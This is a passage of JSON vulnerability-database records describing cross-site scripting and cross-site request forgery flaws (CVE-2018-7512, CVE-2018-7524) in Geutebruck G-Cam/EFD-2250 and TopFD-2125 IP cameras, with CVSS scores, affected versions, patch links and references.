        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7512",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2018-7512",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06023",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "VHN-137544",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7512",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7512",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7512",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06023",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-766",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "IVD",
                "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1",
                "trust": 0.2,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137544",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site scripting vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow remote code execution. Geutebruck G-Cam/EFD-2250 and Topline TopFD-2125 Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7512",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766",
            "trust": 0.9
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E6FB0F-39AB-11E9-B666-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "id": "VAR-201803-2207",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          }
        ],
        "trust": 1.7456349166666667
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "ICS",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          },
          {
            "category": [
              "ICS"
            ],
            "sub_category": null,
            "trust": 0.2
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:53:17.699000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.geutebrueck.com/en_EN.html"
          },
          {
            "title": "Patch for Geutebruck IPCameras Cross-Site Scripting Vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/122839"
          },
          {
            "title": "Geutebr\u00fcck G-Cam/EFD-2250  and Topline TopFD-2125 Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=79352"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-079-01"
          },
          {
            "trust": 1.7,
            "url": "http://www.securityfocus.com/bid/103474"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7512"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7512"
          },
          {
            "trust": 0.3,
            "url": "http://www.geutebrueck.com/en_en/product-overview-31934.html"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "date": "2018-03-22T18:29:00.837000",
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-03-22T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          },
          {
            "date": "2019-10-09T00:00:00",
            "db": "VULHUB",
            "id": "VHN-137544"
          },
          {
            "date": "2018-03-20T00:00:00",
            "db": "BID",
            "id": "103474"
          },
          {
            "date": "2018-05-22T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2018-003341"
          },
          {
            "date": "2019-10-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          },
          {
            "date": "2024-11-21T04:12:16.423000",
            "db": "NVD",
            "id": "CVE-2018-7512"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Geutebruck IP Cameras Cross-Site Scripting Vulnerability",
        "sources": [
          {
            "db": "IVD",
            "id": "e2e6fb0f-39ab-11e9-b666-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06023"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-766"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201803-2216

    Vulnerability from variot - Updated: 2024-11-23 21:53

    A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and Topline TopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following security vulnerabilities: (1) an authentication-bypass vulnerability; (2) a SQL-injection vulnerability; (3) a cross-site request-forgery vulnerability; (4) an access-bypass vulnerability; (5) a security-bypass vulnerability; (6) a cross-site scripting vulnerability. Attackers may exploit these issues to gain unauthorized access to the affected device; to bypass certain security restrictions and perform unauthorized actions; to compromise the application, access or modify data, and exploit vulnerabilities in the underlying database; to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site; or to execute arbitrary code within the context of the affected device. The following devices are vulnerable: Geutebruck G-Cam/EFD-2250 version 1.12.0.4 and Geutebruck Topline TopFD-2125 version 3.15.1. Geutebrück G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of the German company Geutebrück.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201803-2216",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "g-cam/efd-2250",
            "scope": "eq",
            "trust": 1.7,
            "vendor": "geutebruck",
            "version": "1.12.0.4"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam\\/efd-2250",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "geutebrueck",
            "version": "1.12.0.4"
          },
          {
            "model": "topline topfd-2125",
            "scope": "eq",
            "trust": 0.9,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "topfd-2125",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "geutebruck",
            "version": "3.15.1"
          },
          {
            "model": "g-cam/efd-2250",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "geutebruck",
            "version": "1.12.0.19"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "g cam efd 2250",
            "version": "1.12.0.4"
          },
          {
            "model": null,
            "scope": "eq",
            "trust": 0.2,
            "vendor": "topfd 2125",
            "version": "3.15.1"
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:g-cam%2fefd-2250_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:geutebruck:topfd-2125_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Davy Douhine of RandoriSec and Nicolas Mattiocco of Greenlock.",
        "sources": [
          {
            "db": "BID",
            "id": "103474"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2018-7524",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2018-7524",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2018-06021",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "IVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.2,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.9 [IVD]"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "PARTIAL",
                "baseScore": 6.8,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "VHN-137556",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2018-7524",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2018-7524",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "NVD",
                "id": "CVE-2018-7524",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2018-06021",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201803-763",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "IVD",
                "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1",
                "trust": 0.2,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-137556",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A cross-site request forgery vulnerability has been identified in Geutebruck G-Cam/EFD-2250 Version 1.12.0.4 and Topline TopFD-2125 Version 3.15.1 IP cameras, which may allow an unauthorized user to be added to the system. The G-Cam/EFD-2250 and ToplineTopFD-2125 are both high-definition cameras from Geutebruck. Multiple Geutebruck devices are prone to the following multiple security vulnerabilities. \n1. An authentication-bypass vulnerability\n2. A SQL-injection vulnerability\n3. A cross-site request-forgery vulnerability\n4. An access-bypass vulnerability\n5. A security-bypass vulnerability\n6. A cross-site scripting vulnerability\nAttackers may exploit these issues to gain unauthorized access to the   affected device, or to bypass certain security restrictions to perform  unauthorized actions, to compromise the application to access or modify  data and to exploit vulnerabilities in the underlying database, to  execute arbitrary script code in the browser of an unsuspecting user in  the context of the affected site or to  execute arbitrary code within  the context of the  affected device. \nThe following devices are vulnerable:\nGeutebruck G-Cam/EFD-2250 version 1.12.0.4\nGeutebruck Topline TopFD-2125 version 3.15.1. Geutebr\u00fcck G-Cam/EFD-2250 and Topline TopFD-2125 are IP camera products of German Geutebr\u00fcck company",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2018-7524",
            "trust": 3.6
          },
          {
            "db": "ICS CERT",
            "id": "ICSA-18-079-01",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "103474",
            "trust": 2.0
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344",
            "trust": 0.8
          },
          {
            "db": "IVD",
            "id": "E2E8F6E1-39AB-11E9-AC0F-000C29342CB1",
            "trust": 0.2
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "IVD",
            "id": "e2e8f6e1-39ab-11e9-ac0f-000c29342cb1"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2018-06021"
          },
          {
            "db": "VULHUB",
            "id": "VHN-137556"
          },
          {
            "db": "BID",
            "id": "103474"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2018-003344"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201803-763"
          },
          {
            "db": "NVD",
            "id": "CVE-2018-7524"
          }
        ]
      },
      "id": "VAR-201803-2216",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
